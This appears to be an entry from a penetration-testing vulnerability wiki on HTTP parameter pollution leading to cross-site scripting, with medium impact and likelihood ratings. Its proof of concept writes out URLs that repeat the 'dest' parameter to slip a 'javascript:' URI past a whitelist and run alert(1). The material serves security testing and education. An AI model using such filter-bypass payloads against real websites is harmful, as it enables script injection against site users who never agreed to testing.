Cobalt Crowdsourced Application PentestCobalt Crowdsourced Application PentestCobalt Crowdsourced Application Pentest

Cobalt Vulnerability Wiki


V5 - Validation/Sanitization

HTTP Parameter Pollution to XSS

POC

See the common payloads below while testing: https://target.com/endpoint.aspx?dest=data://whitelistedWebsite.com → Accepted https://target.com/endpoint.aspx?dest=http://google.com → not Accepted https://target.com/endpoint.aspx?dest=javascript:/whitelistedWebsite.com/i&dest=alert(1) Observe exploitation of XSS

Impact

Medium

Likelihood

Medium